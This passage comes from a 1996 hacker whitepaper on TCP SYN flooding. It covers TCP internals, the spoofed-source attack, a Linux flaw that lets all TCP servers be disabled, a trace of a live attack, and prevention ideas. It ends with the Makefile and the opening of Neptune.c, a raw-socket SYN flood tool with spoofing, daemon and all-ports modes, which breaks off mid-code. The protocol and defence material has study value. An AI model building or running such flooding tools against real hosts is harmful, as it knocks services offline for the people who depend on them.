  10472.  
  10473.               --[ TCP Control Flags  ]--
  10474.  
  10475.  
  10476.     There are six TCP control flags.  We are only concerned with 3, but 
  10477. the others are included for posterity:
  10478.  
  10479. *SYN:    Synchronize Sequence Numbers
  10480.     The synchronize sequence numbers field is valid.  This flag is only 
  10481. valid during the 3-way handshake.  It tells the receiving TCP to check the 
  10482. sequence number field, and note it's value as the connection-initiator's 
  10483. (usually the client) initial sequence number.  TCP sequence numbers can 
  10484. simply be thought of as 32-bit counters.  They range from 0 to 4,294,967,295.
  10485. Every byte of data exchanged across a TCP connection (along with certain 
  10486. flags) is sequenced.  The sequence number field in the TCP header will contain
  10487. the sequence number of the *first* byte of data in the TCP segment.  
  10488.  
  10489. *ACK:    Acknowledgement
  10490.     The acknowledgement number field is valid.  This flag is almost always
  10491. set.   The acknowledgement number field in the TCP header holds the value of 
  10492. the next *expected* sequence number (from the other side), and also 
  10493. acknowledges *all* data (from the other side) up through this ACK number minus
  10494. one.
  10495.  
  10496. *RST:    Reset
  10497.     Destroy the referenced connection.  All memory structures are torn 
  10498. down.
  10499.  
  10500. URG:    Urgent 
  10501.     The urgent pointer is valid.  This is TCP's way of implementing out
  10502. of band (OOB) data.  For instance, in a telnet connection a `ctrl-c` on the 
  10503. client side is considered urgent and will cause this flag to be set. 
  10504.  
  10505. PSH:    Push
  10506.     The receiving TCP should not queue this data, but rather pass it to 
  10507. the application as soon as possible.  This flag should always be set in 
  10508. interactive connections, such as telnet and rlogin.
  10509.  
  10510. FIN:    Finish 
  10511.     The sending TCP is finished transmitting data, but is still open to 
  10512. accepting data.
  10513.  
  10514.  
  10515.                 --[ Ports ]--
  10516.                 
  10517.     
  10518.     To grant simultaneous access to the TCP module, TCP provides a user 
  10519. interface called a port.  Ports are used by the kernel to identify network 
  10520. processes.  They are strictly transport layer entities.  Together with an 
  10521. IP address, a TCP port provides provides an endpoint for network 
  10522. communications.  In fact, at any given moment *all* Internet connections can 
  10523. be described by 4 numbers: the source IP address and source port and the 
  10524. destination IP address and destination port.  Servers are bound to 
  10525. 'well-known' ports so that they may be located on a standard port on 
  10526. different systems.  For example, the telnet daemon sits on TCP port 23.
  10527.     
  10528.  
  10529.  
  10530.         Section II.    TCP Memory Structures and the Backlog
  10531.  
  10532.         
  10533.  
  10534.     For a copius treatment of the topic of SYN flooding, it is necessary
  10535. to look at the memory structures that TCP creates when a client SYN arrives
  10536. and the connection is pending (that is, a connection that is somewhere in 
  10537. the process of the three-way handshake and TCP is in the SYN_SENT or 
  10538. SYN_RVCD state).
  10539.  
  10540.  
  10541.         --[ BSD ]--        
  10542.  
  10543.  
  10544.     Under BSD style network code, for any given pending TCP connection 
  10545. there are three memory structures that are allocated (we do not discuss the 
  10546. process (proc) structure and file structure, but the reader should be aware 
  10547. that they exist as well.):
  10548.  
  10549. Socket Structure (socket{}):     
  10550.     Holds the information related to the local end of the communications 
  10551. link: protocol used, state information, addressing information, connection 
  10552. queues, buffers, and flags.
  10553.  
  10554. Internet Protocol Control Block Structure (inpcb{}):
  10555.     PCB's are used at the transport layer by TCP (and UDP) to hold various
  10556. pieces of information needed by TCP.  They hold: TCP state information, IP 
  10557. address information, port numbers, IP header prototype and options and a 
  10558. pointer to the routing table entry for the destination address.  PCB's are 
  10559. created for a given TCP based server when the server calls listen(),
  10560.  
  10561. TCP Control Block Structure (tcpcb{}):
  10562.     The TCP control block contains TCP specific information such as timer
  10563. information, sequence number information, flow control status, and OOB data.
  10564.  
  10565.  
  10566.         --[ Linux ]--
  10567.  
  10568.  
  10569.     Linux uses a different scheme of memory allocation to hold network
  10570. information.  The socket structure is still used, but instead of the pcb{} 
  10571. and tcpcb{}, we have:
  10572.  
  10573. Sock Structure (sock{}):
  10574.     Protocol specific information, most of the data structures are TCP
  10575. related.  This is a huge structure.
  10576.  
  10577. SK Structure (sk_buff{}):
  10578.     Holds more protocol specific information including packet header 
  10579. information, also contains a sock{}.
  10580.  
  10581. According to Alan Cox:
  10582.     The inode is the inode holding the socket (this may be a dummy inode 
  10583. for non file system sockets like IP), the socket holds generic high level
  10584. methods and the struct sock is the protocol specific object, although all but 
  10585. a few experimental high performance items use the same generic struct sock and
  10586. support code. That holds chains of linear buffers (struct sk_buff's).
  10587.  
  10588. [ struct inode -> struct socket -> struct sock -> chains of sk_buff's ]
  10589.  
  10590.  
  10591.         --[ The Backlog Queue]--
  10592.  
  10593.     
  10594.     These are large memory structures.  Every time a client SYN arrives
  10595. on a valid port (a port where a TCP server is listen()ing), they must be 
  10596. allocated.  If there were no limit, a busy host could easily exhuast all of
  10597. it's memory just trying to process TCP connections.  (This would be an even
  10598. simpler DOS attack.)  However, there is an upper limit to amount of 
  10599. concurrent connection requests a given TCP can have outstanding for a 
  10600. given socket.  This limit is the backlog and it is the length of the queue
  10601. where incoming (as yet incomplete) connections are kept.  This queue limit 
  10602. applies to both the number of imcomplete connections (the 3-way handshake has
  10603. not been completed) and the number of completed connections that have not 
  10604. been pulled from the queue by the application by way of the accept() call.
  10605. If this backlog limit is reached, we will see that TCP will silently 
  10606. discard all incoming connection requests until the pending connections can 
  10607. be dealt with.  
  10608.     The backlog is not a large value.  It does not have to be.  Normally
  10609. TCP is quite expedient in connection establishment processing.  Even if a
  10610. connection arrived while the queue was full, in all likelyhood, when the
  10611. client retransmits it's connection request segment, the receiving TCP will
  10612. have room again in it's queue.  Different TCP implementations have different
  10613. backlog sizes.   Under BSD style networking code, there is also 'grace' margin 
  10614. of 3/2.  That is, TCP will allow up to backlog*3/2+1 connections.  This will
  10615. allow a socket one connection even if it calls listen with a backlog of 0.  
  10616. Some common backlog values:
  10617.                         fig(2)
  10618.  
  10619.    OS        Backlog      BL+Grace  Notes    
  10620. ---------------------------------------------------------------------------
  10621. SunOS 4.x.x:     5             8 
  10622. IRIX 5.2:     5         8
  10623. Solaris
  10624. Linux 1.2.x:     10        10   Linux does not have this grace margin.
  10625. FreeBSD 2.1.0:          32
  10626. FreeBSD 2.1.5:           128
  10627. Win NTs 3.5.1:     6         6   NT does not appear to have this margin.
  10628. Win NTw 4.0:     6         6   NT has a pathetic backlog.
  10629.  
  10630.  
  10631.  
  10632.         Section III.    TCP Input Processing
  10633.  
  10634.  
  10635.     
  10636.     To see exactly where the attack works it is necessary to watch as 
  10637. the receiving TCP processes an incoming segment.  The following is true for
  10638. BSD style networking, and only processes relevant to this paper are 
  10639. discussed.
  10640.  
  10641. A packet arrives and is demultiplexed up the protocol stack to TCP.  The TCP
  10642. state is LISTEN:
  10643.  
  10644. Get header information:
  10645.     TCP retrieves the TCP and IP headers and stores the information in
  10646. memory.
  10647. Verify the TCP checksum:
  10648.     The standard Internet checksum is applied to the segment.  If it 
  10649. fails, no ACK is sent, and the segment is dropped, assuming the client will
  10650. retranmit it.
  10651. Locate the PCB{}:
  10652.     TCP locates the pcb{} associated with the connection.  If it is not
  10653. found, TCP drops the segment and sends a RST.  (Aside: This is how TCP
  10654. handles connections that arrive on ports with no server listen()ing.)  If
  10655. the PCB{} exists, but the state is CLOSED, the server has not called 
  10656. connect() or listen().  The segment is dropped, but no RST is sent.  The
  10657. client is expected to retransmit it's connection request.  We will see this
  10658. occurence when we discuss the 'Linux Anomaly'.
  10659. Create new socket:
  10660.     When a segment arrives for a listen()ing socket, a slave socket is
  10661. created.  This is where a socket{}, tcpcb{}, and another pcb{} are created.
  10662. TCP is not committed to the connection at this point, so a flag is set to
  10663. cause TCP to drop the socket (and destroy the memory structures) if an
  10664. error is encountered.  If the backlog limit is reached, TCP considers this 
  10665. an error, and the connection is refused.  We will see that this is exactly 
  10666. why the attack works.    Otherwise, the new socket's TCP state is LISTEN, and
  10667. the completion of the passive open is attempted.
  10668. Drop if RST, ACK, or no SYN:
  10669.     If the segment contains a RST, it is dropped.  If it contains an
  10670. ACK, it is dropped, a RST is sent and the memory structures torn down (the
  10671. ACK makes no sense for the connection at this point, and is considered an
  10672. error).  If the segment does not have the SYN bit on, it is dropped.  If
  10673. the segment contains a SYN, processing continues.
  10674. Address processing, etc:
  10675.     TCP then gets the clients address information into a buffer and 
  10676. connects it's pcb{} to the client, processes any TCP options, and 
  10677. initializes it's initial send sequence (ISS) number.
  10678. ACK the SYN:
  10679.     TCP sends a SYN, ISS and an ACK to the client.  The connection
  10680. establishment timer is set for 75 seconds at this point. The state changes 
  10681. to SYN_RCVD.  Now. TCP is commited to the socket.  We will see that this 
  10682. is state the target TCP will be in when in the throes of the attack because
  10683. the expected client response is never received.  The state remains SYN_RCVD
  10684. until the connection establishment timer expires, in which case the all the 
  10685. memory structures associated with the connection are destroyed, and the
  10686. socket returns to the LISTEN state.
  10687.  
  10688.         
  10689.  
  10690.         Section IV.    The Attack
  10691.  
  10692.  
  10693.     
  10694.     A TCP connection is initiated with a client issuing a request to a 
  10695. server with the SYN flag on in the TCP header.  Normally the server will 
  10696. issue a SYN/ACK back to the client identified by the 32-bit source address in 
  10697. the IP header.  The client will then send an ACK to the server (as we 
  10698. saw in figure 1 above) and data transfer can commence.  When the client IP 
  10699. address is spoofed to be that of an unreachable, host, however, the targetted
  10700. TCP cannot complete the 3-way handshake and will keep trying until it times 
  10701. out.  That is the basis for the attack.
  10702.     The attacking host sends a few (we saw that as little as 6 is 
  10703. enough) SYN requests to the target TCP port (for example, the telnet daemon).
  10704. The attacking host also must make sure that the source IP-address is spoofed 
  10705. to be that of another, currently unreachable host (the target TCP will be 
  10706. sending it's response to this address).  IP (by way of ICMP) will inform TCP 
  10707. that the host is unreachable, but TCP considers these errors to be transient 
  10708. and leaves the resolution of them up to IP (reroute the packets, etc) 
  10709. effectively ignoring them.  The IP-address must be unreachable because the 
  10710. attacker does not want *any* host to recieve the SYN/ACKs that will be coming 
  10711. from the target TCP, which  would elicit a RST from that host (as we saw in
  10712. TCP input above).  This would foil the attack.  The process is as follows:
  10713.  
  10714.             fig(3)
  10715.  
  10716.     1    Z(x)    ---SYN--->    A
  10717.  
  10718.         Z(x)    ---SYN--->    A
  10719.  
  10720.         Z(x)    ---SYN--->    A
  10721.  
  10722.         Z(x)    ---SYN--->    A
  10723.  
  10724.         Z(x)    ---SYN--->    A
  10725.  
  10726.         Z(x)    ---SYN--->    A
  10727.  
  10728.  
  10729.     2    X    <---SYN/ACK---     A
  10730.  
  10731.         X    <---SYN/ACK---    A
  10732.  
  10733.             ...
  10734.  
  10735.     3    X      <---RST---    A
  10736.  
  10737.  
  10738. At (1) the attacking host sends a multitude of SYN requests to the target 
  10739. to fill it's backlog queue with pending connections.  (2) The target responds
  10740. with SYN/ACKs to what it believes is the source of the incoming SYNs.  During
  10741. this time all further requests to this TCP port will be ignored.  The target
  10742. port is flooded.
  10743.  
  10744.  
  10745.         --[ Linux Anomaly ]--
  10746.  
  10747.  
  10748.     In doing my research for this project, I noticed a very strange
  10749. implementation error in the TCP module of Linux.   When a particular TCP 
  10750. server is flooded on a Linux host, strange things are afoot...  First, it 
  10751. appears that the connection-establishment timer is broken.  The 10 spoofed 
  10752. connection-requests keep the sockets in the SYN_RCVD state for just 
  10753. over 20 minutes (23 minutesto be exact.  Wonder what the signifigance of 
  10754. this is... Hmmm...).  Much longer than the 75-seconds it *should* be.  The 
  10755. next oddity is even more odd... After that seemingly arbitrary time period
  10756. (I have to determine what the hell is going on there), TCP moves the flooded
  10757. sockets into the CLOSE state, where they *stay* until a connection-request
  10758. arrives on a *different* port.  If a connection-request arrives on the 
  10759. flooded port (now in the CLOSE state), it will not answer, acting as if it
  10760. is still flooded.  After the connection-request arrives on a different port,
  10761. the CLOSEd sockets will be destroyed, and the original flooded port will be
  10762. free to answer requests again.  It seems as though the connection-request
  10763. will spark the CLOSEd sockets into calling listen()...  Damn wierd if you ask
  10764. me...
  10765.      The implications of this are severe.  I have been able to completely
  10766. disable all TCP based servers from answering requests indefinitely.  If all
  10767. the TCP servers are flooded, there are none to recieve the valid connection
  10768. request to alleviate the CLOSE state from the flooded connections.  Bad 
  10769. news indeed. 
  10770.     [Note: as of 7.15.96 this is a conundrum.  I have contacted Alan
  10771. Cox and Eric Schenk and plan to work with them on a solution to this 
  10772. problem.  I be forthcoming with all our findings as soon as possible.  I 
  10773. believe the problem to perhaps lie (at least in part) in the 
  10774. tcp_close_pending() function...  Or perhaps there is a logic error in how
  10775. TCP switches between the connection-establishment timer and the 
  10776. keep-alive timer.  They are both implemented using the same variable since
  10777. they are mutally exclusive...]
  10778.  
  10779.  
  10780.     
  10781.  
  10782.         Section V.    Network Trace
  10783.  
  10784.     
  10785.  
  10786.     The following is a network trace from an actual SYN flooding session.
  10787. The target machine is Ash, a Linux 1.2.13 box.  The attacker is Onyx.  The
  10788. network is a 10Mbps ethernet.
  10789.  
  10790. Network Monitor trace  Fri 07/12/96 10:23:34  Flood1.TXT
  10791.  
  10792. Frame   Time    Src MAC Addr   Dst MAC Addr   Protocol     Description                                                       Src Other Addr  Dst Other Addr  Type Other Addr
  10793.  
  10794. 1       2.519   onyx           ash            TCP/23       ....S., len:    4, seq:3580643269, ack:1380647758, win:  512, src 192.168.2.2     192.168.2.7     IP
  10795. 2       2.520   ash            onyx           TCP/1510     .A..S., len:    4, seq: 659642873, ack:3580643270, win:14335, src 192.168.2.7     192.168.2.2     IP
  10796. 3       2.520   onyx           ash            TCP/23       .A...., len:    0, seq:3580643270, ack: 659642874, win:14260, src 192.168.2.2     192.168.2.7     IP
  10797.  
  10798.     A telnet client is started on Onyx, and we see the standard 3-way 
  10799.     handshake between the two hosts for the telnet session.
  10800.  
  10801. Lines 4-126 were interactive telnet traffic and added nothing to the 
  10802. discussion.
  10803.  
  10804. 127     12.804  ash            onyx           TCP/1510     .A...F, len:    0, seq: 659643408, ack:3580643401, win:14335, src 192.168.2.7     192.168.2.2     IP
  10805. 128     12.804  onyx           ash            TCP/23       .A...., len:    0, seq:3580643401, ack: 659643409, win:14322, src 192.168.2.2     192.168.2.7     IP
  10806. 129     12.805  onyx           ash            TCP/23       .A...F, len:    0, seq:3580643401, ack: 659643409, win:14335, src 192.168.2.2     192.168.2.7     IP
  10807. 130     12.805  ash            onyx           TCP/1510     .A...., len:    0, seq: 659643409, ack:3580643402, win:14334, src 192.168.2.7     192.168.2.2     IP
  10808.  
  10809.     Here we see the 4-way connection termination procedure.
  10810.  
  10811.     At this point, the flood program is started on onyx, the information
  10812.     filled in, and the attack is launched. 
  10813.     
  10814. 131     42.251  onyx           *BROADCAST     ARP_RARP  ARP: Request, Target IP: 192.168.2.7                                                               
  10815.  
  10816.     Onyx is attempting to get ash's ethernet address using ARP.  
  10817.     
  10818. 132     42.251  ash            onyx           ARP_RARP  ARP: Reply, Target IP: 192.168.2.2 Target Hdwr Addr: 0020AF2311D7                                  
  10819.  
  10820.     Ash responds with it's ethernet address.
  10821.  
  10822. 133     42.252  onyx           ash            TCP/23       ....S., len:    0, seq:3364942082, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
  10823.  
  10824.     The flood begins.  Onyx sends the first of 10 TCP segments with the
  10825.     SYN bit on, and the IP address spoofed to the telnet daemon.
  10826.  
  10827. 134     42.252  ash            *BROADCAST     ARP_RARP  ARP: Request, Target IP: 192.168.2.10                                                              
  10828.  
  10829.     Ash immediately attempts to resolve the ethernet address.  However,
  10830.     since there is no such host on the network (and no router to proxy
  10831.     the request with) the ARP request will not be answered.  The host,
  10832.     is in effect, unreachable.
  10833.  
  10834. 135     42.271  onyx           ash            TCP/23       ....S., len:    0, seq:3381719298, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
  10835. 136     42.291  onyx           ash            TCP/23       ....S., len:    0, seq:3398496514, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
  10836. 137     42.311  onyx           ash            TCP/23       ....S., len:    0, seq:3415273730, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
  10837. 138     42.331  onyx           ash            TCP/23       ....S., len:    0, seq:3432050946, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
  10838. 139     42.351  onyx           ash            TCP/23       ....S., len:    0, seq:3448828162, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
  10839. 140     42.371  onyx           ash            TCP/23       ....S., len:    0, seq:3465605378, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
  10840. 141     42.391  onyx           ash            TCP/23       ....S., len:    0, seq:3482382594, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
  10841. 142     42.411  onyx           ash            TCP/23       ....S., len:    0, seq:3499159810, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
  10842. 143     42.431  onyx           ash            TCP/23       ....S., len:    0, seq:3515937026, ack:         0, win:  242, src 192.168.2.10    192.168.2.7     IP
  10843.  
  10844.     The next 9 of 10 SYNs.  The telnet daemon on ash is now flooded.
  10845.     At this point, another telnet client is started on Onyx.
  10846.  
  10847. 144     47.227  onyx           *BROADCAST     ARP_RARP  ARP: Request, Target IP: 192.168.2.7                                                               
  10848.  
  10849.     Onyx is again attempting to get ash's ethernet address using ARP.
  10850.     Hmmm, this entry should be in the arp cache.  I should look into 
  10851.     this.  
  10852.  
  10853. 145     47.228  ash            onyx           ARP_RARP  ARP: Reply, Target IP: 192.168.2.2 Target Hdwr Addr: 0020AF2311D7                                  
  10854.  
  10855.     Here is the ARP reply.
  10856.  
  10857. 146     47.228  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:  512, src 192.168.2.2     192.168.2.7     IP
  10858. 147     50.230  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src 192.168.2.2     192.168.2.7     IP
  10859. 148     56.239  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src 192.168.2.2     192.168.2.7     IP
  10860.  
  10861.     Onyx is attempting to establish a connection with the telnet daemon
  10862.     on Ash, which is, as we saw, flooded.
  10863.  
  10864. 149     67.251  ash            *BROADCAST     ARP_RARP  ARP: Request, Target IP: 192.168.2.10                                                              
  10865.  
  10866.     Ash is still trying to get the ethernet address of the spoofed host.
  10867.     In vain...
  10868.  
  10869. 150     68.247  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src 192.168.2.2     192.168.2.7     IP
  10870. 151     92.254  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src 192.168.2.2     192.168.2.7     IP
  10871.  
  10872.     Onyx is still transmitting it's connection-estabishment requests...
  10873.     Also in vain.
  10874.  
  10875. 152     92.258  ash            *BROADCAST     ARP_RARP  ARP: Request, Target IP: 192.168.2.10                                                              
  10876.  
  10877.     Hello?  Are you out there?
  10878.  
  10879.  
  10880.  
  10881.         Section VI.    Neptune.c
  10882.  
  10883.  
  10884.     
  10885.     Neptune.c is the companion code.  It does everything we've talked 
  10886. about, and more.  Neptune.c is admittedly more complex than it needs to 
  10887. be.  I included several features that are not essential, but make the 
  10888. program more robust.  The program features: simple to use menuing system, an 
  10889. alternative command line interface for easy integration into scripts, 
  10890. ICMP_ECHO requesting to query if unreachable is in fact unreachable (AKA 
  10891. 'ping'ing), infinity mode (read the code) and a daemon mode with (psuedo) 
  10892. random unreachable IP address choosing.
  10893.  
  10894.     The menu is really self explanatory...
  10895.  
  10896. 1        Enter target host
  10897.  
  10898. Enter yur target.  If you are confused at this point, kill yurself.
  10899.  
  10900. 2        Enter source (unreachable) host
  10901.  
  10902. Enter the puported sender.  It is integral that this host be routable but not
  10903. reachable.  Remember that the address must be a unicast address.  If it is a
  10904. broadcast or multicast address it will be dropped by the target TCP.
  10905.  
  10906. 3        Send ICMP_ECHO(s) to unreachable
  10907.  
  10908. Make sure that yur puported sender is in fact unreachable.  This is not 100%
  10909. reliable as A) ICMP packets can be dropped by the unreliable network layer, 
  10910. B) the host may filter out ICMP_ECHO packets.
  10911.  
  10912. 4        Enter port number to flood
  10913.     
  10914. The target port to flood.  There is an infinity switch.
  10915.  
  10916. 5        Enter number of SYNs
  10917.     
  10918. The number of SYNs to send.  Remember, this attack is not bandwidth hungry, 
  10919. sending more packets than neccessary is totally useless.
  10920.  
  10921. 6        Quit
  10922.     
  10923. Bye, bye.
  10924.  
  10925. 7        Lanuch
  10926.     
  10927. Fire when ready.
  10928.  
  10929. 8        Daemonize (may or may not be implemented in yur version)
  10930.  
  10931. Puts the program in dameon mode.  It forks to the background and does it's 
  10932. evilness there.  Needs two more options:  packet sending interval, and time 
  10933. for daemon to live.  Recommended packet sending interval is at least every
  10934. 90 seconds, depending on the target TCP.  80 should work fine, as the 
  10935. connection establishment timer is 75 seconds.  Daemon lifetime is up to you.
  10936. Be kind.  
  10937.     Also the daemon portion includes routines to optionally make use
  10938. of a file of unreachable IP addresses and (pseudo) randomly choose from 
  10939. them.  The program reads the file and builds a dynamic array of these IP
  10940. addresses in network byte order and then uses rand (seeded from the time of
  10941. day in seconds --we don't need alot of entropy here, this isn't 
  10942. cryptography--) to generate a number and then it mods that number by the 
  10943. number of entries in the table to hash to a particular IP address. 
  10944.  
  10945.     Since the program opens raw sockets, it needs to run as root.  By
  10946. default, it is installed SUID root in /usr/local/bin/neptune with the access
  10947. list in /etc/sfaccess.conf.  The authentication mechanism works by checking 
  10948. the usernames (via UID) of the attempted flooders.  It is not a complex 
  10949. algorithm, and in fact the code is quite simple (asside:  If anyone can find 
  10950. any security problems with the program being SUID root, --above the fact 
  10951. that the program is admittedly evil-- I would love to hear about them).  Root 
  10952. is the only entry the access file starts off with.
  10953.     For the program to work, you need to remove the comment marks from 
  10954. line 318 (the actual sendto() call where the forged datagrams are sent).  I 
  10955. did that so the fools simply interested in causing trouble (and not interested
  10956. in learning) would find the program mostly useless.
  10957.  
  10958.  
  10959.  
  10960.         Section VII.    Discussion and Prevention
  10961.  
  10962.  
  10963.  
  10964.     As we have seen, the attack works because TCP is attempting to do it's
  10965. job of providing a reliable transport.  TCP must establish a connection first,
  10966. and this is where the weakness lies.  (T/TCP is immune to this attack via TAO.
  10967. See my future paper: `The Next Generation Internet` for information on T/TCP
  10968. and IPng.)  Under normal circumstances, assuming well-behaved networking 
  10969. software, the worst that can happen is a TCP-based server may be wrapped up in 
  10970. legimate connection-establishment processing and a few clients may have to 
  10971. retransmit thier SYNs.  But, a misbegotten client program can exploit this 
  10972. connection-establishment weakness and down a TCP-based server with only a few
  10973. doctored segments.  
  10974.     The fact that SYN flooding requires such a small amount of network 
  10975. traffic to be so effective is important to note.  Consider other network
  10976. DOS attacks such as ICMP_ECHO floods (ping floods), mail bombs, mass mailing 
  10977. list subscriptions, etc...  To be effective, all of these attacks require 
  10978. an attacker to transmit volumous amounts of network traffic.  Not only does
  10979. this make these attacks more noticable on both ends by decreasing the amount 
  10980. of available bandwidth (as such, often these attacks are waged from compromised 
  10981. machines) but it also adds to the general traffic problems of the Internet.
  10982. SYN flooding can be deadly effective with as little as 360 packets/hour.
  10983.     
  10984.  
  10985.         --[ Prevention ]--
  10986.  
  10987.  
  10988.     Ok, so how do we stop it?  Good question.  
  10989.  
  10990.  
  10991.         --[ TCPd ]--
  10992.  
  10993.  
  10994.     TCP wrappers are almost useless.  The magic they do is based on the 
  10995. validity of the source IP-address of incoming datagrams.  As we know, this can
  10996. be spoofed to whatever the attacker desires.  Unless the target has denied 
  10997. traffic from *everywhere* except known hosts, TCP wrappers will not save you.
  10998.  
  10999.  
  11000.         --[ Increase the Backlog ]--
  11001.  
  11002.  
  11003.     Increasing the default backlog is not much of a solution.  In 
  11004. comparision with the difficulty of an attacker simply sending more packets,
  11005. the memory requirements of the additional connection-establishment structures
  11006. is prohibitively expensive.  At best it is an obfuscative (word check...?)
  11007. measure.
  11008.  
  11009.  
  11010.         --[ Packet Filtering ]--
  11011.         
  11012.  
  11013.     A smart packet filter (or kernel modification) of some kind may be 
  11014. a viable solution.  Briefly:
  11015.  
  11016. - Host keeps a recent log of incoming packets with the `SYN` bit on in a 
  11017. linked list structure.
  11018. - The linked list cannot be permitted to grow without bound (another DOS
  11019. attack would present itself)
  11020. - When x amount of SYNs are received on a socket, certain characteristics
  11021. about the packets are compared, (Source port, source IP address, sequence
  11022. numbers, window size, etc) and if things seem fishy, the connection
  11023. requests and associated memory structures are immediately destroyed.
  11024.  
  11025.  
  11026.  
  11027.         Section VIII.    References
  11028.  
  11029.  
  11030.  
  11031.         Ppl:    A. Cox, R. Stevens
  11032.         Books:    TCP Illustrated vols II,III
  11033.         
  11034.  
  11035.  
  11036. This project made possible by a grant from the Guild Corporation.
  11037.  
  11038. EOF
  11039.  
  11040.  
  11041. ------------------------8<--------------------------------------------
  11042.  
  11043.  
  11044. # Neptune Makefile
  11045. # daemon9, 1996 Guild Productions
  11046.  
  11047. all:
  11048.     @gcc -o neptune neptune.c
  11049.     @echo ""
  11050.     @echo "'make install' will install the program..."
  11051.     @echo ""
  11052.     @echo "Warning!  Neptune is installed SUID root by default!"
  11053.     @echo ""
  11054.     @echo "route@infonexus.com / Guild Corporation"
  11055. install:
  11056.     strip ./neptune
  11057.     mv ./neptune /usr/local/bin/neptune
  11058.     chmod 4755 /usr/local/bin/neptune
  11059.     @echo "root" > /etc/sfaccess.conf
  11060.     @echo "Installation complete, access list is /etc/sfaccess.conf"
  11061. clean: 
  11062.     @rm -f *.o neptune /etc/sfaccess.conf
  11063.  
  11064.  
  11065. ------------------------8<--------------------------------------------
  11066.  
  11067.  
  11068. /*
  11069.                     Neptune
  11070.                     v. 1.5
  11071.  
  11072.             daemon9/route/infinity
  11073.  
  11074.               June 1996 Guild productions
  11075.  
  11076.                  comments to daemon9@netcom.com
  11077.     
  11078.     If you found this code alone, without the companion whitepaper
  11079.     please get the real-deal:
  11080. ftp.infonexus.com/pub/SourceAndShell/Guild/Route/Projects/Neptune/neptune.tgz
  11081.     
  11082. Brief synopsis:
  11083.     Floods the target host with TCP segments with the SYN bit on,
  11084.     puportedly from an unreachable host.  The return address in the 
  11085.     IP header is forged to be that of a known unreachable host.  The
  11086.     attacked TCP, if flooded sufficently, will be unable to respond
  11087.     to futher connects.  See the accompanying whitepaper for a full 
  11088.     treatment of the topic.  (Also see my paper on IP-spoofing for
  11089.     information on a related subject.)
  11090.  
  11091. Usage:
  11092.     Figure it out, kid.  Menu is default action.  Command line usage is
  11093.     available for easy integration into shell scripts.  If you can't
  11094.     figure out an unreachable host, the program will not work.
  11095.  
  11096. Gripes: 
  11097.     It would appear that flooding a host on every port (with the 
  11098.     infinity switch) has it's drawbacks.  So many packets are trying to 
  11099.     make their way to the target host, it seems as though many are 
  11100.     dropped, especially on ethernets.  Across the Internet, though, the 
  11101.     problem appears mostly mitigated.  The call to usleep appears to fix 
  11102.     this...  Coming up is a port scanning option that will find open 
  11103.     ports...
  11104.  
  11105. Version History:
  11106. 6/17/96 beta1:    SYN flooding, Cmd line and crude menu, ICMP stuff broken
  11107. 6/20/96    beta2:    Better menu, improved SYN flooding, ICMP fixed... sorta
  11108. 6/21/96    beta3:    Better menu still, fixed SYN flood clogging problem
  11109.         Fixed some name-lookup problems
  11110. 6/22/96    beta4:    Some loop optimization, ICMP socket stuff changed, ICMP
  11111.         code fixed
  11112. 6/23/96 1.0:    First real version...
  11113. 6/25/96    1.1:    Cleaned up some stuff, added authentication hooks, fixed up
  11114.         input routine stuff
  11115. 7/01/96    1.5:    Added daemonizing routine...
  11116.  
  11117.    This coding project made possible by a grant from the Guild corporation
  11118.  
  11119. */
  11120.  
  11121. #include <stdio.h>
  11122. #include <stdlib.h>
  11123. #include <string.h>
  11124. #include <syslog.h>
  11125. #include <pwd.h>
  11126. #include <unistd.h>
  11127. #include <netinet/in.h>
  11128. #include <arpa/inet.h>
  11129. #include <netdb.h>
  11130. #include <sys/socket.h>
  11131. #include <sys/ioctl.h>
  11132. #include <fcntl.h>
  11133. #include <time.h>
  11134. #include <linux/signal.h>
  11135. #include <linux/ip.h>
  11136. #include <linux/tcp.h>
  11137. #include <linux/icmp.h>
  11138.  
  11139. #define BUFLEN 256
  11140. #define MENUBUF    64
  11141. #define MAXPORT 1024
  11142. #define    MAXPAK 4096        
  11143. #define    MENUSLEEP 700000     
  11144. #define    FLOODSLEEP 100        /* Ethernet, or WAN? Yur mileage will vary.*/
  11145. #define    ICMPSLEEP 100        
  11146. #define ACCESSLIST "/etc/sfaccess.conf"
  11147.  
  11148. int HANDLERCODE=1;
  11149. int KEEPQUIET=0;
  11150. char werd[]={"\nThis code made possible by a grant from the Guild Corporation\n\0"};
  11151.  
  11152. void main(argc,argv)
  11153. int argc;
  11154. char *argv[];
  11155. {
  11156.     
  11157.     void usage(char *);
  11158.     void menu(int,char *);
  11159.     void flood(int,unsigned,unsigned,u_short,int);
  11160.     unsigned nameResolve(char *);
  11161.     int authenticate(int,char *);    
  11162.  
  11163.     unsigned unreachable,target;    
  11164.     int c,port,amount,sock1,fd;
  11165.     struct passwd *passEnt;
  11166.     char t[20],u[20];
  11167.  
  11168.     if((fd=open(ACCESSLIST,O_RDONLY))<=0){
  11169.         perror("Cannot open accesslist");
  11170.         exit(1);
  11171.     }
  11172.     setpwent();
  11173.     passEnt=getpwuid(getuid());
  11174.     endpwent();
  11175.                 /* Authenticate */
  11176.     if(!authenticate(fd,passEnt->pw_name)){
  11177.         fprintf(stderr,"Access Denied, kid\n");
  11178.         exit(0);
  11179.     }
  11180.                 /* Open up a RAW socket */
  11181.  
  11182.        if((sock1=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
  11183.            perror("\nHmmm.... socket problems\n");
  11184.               exit(1);
  11185.        } 
  11186.     if(argc==1){
  11187.         menu(sock1,passEnt->pw_name);
  11188.         exit(0);
  11189.     }
  11190.                 /* Parse command-line arguments */
  11191.     while((c=getopt(argc,argv,"8:s:t:p:a"))){
  11192.               switch(c){
  11193.             case 's':    /* Source (spoofed) host */
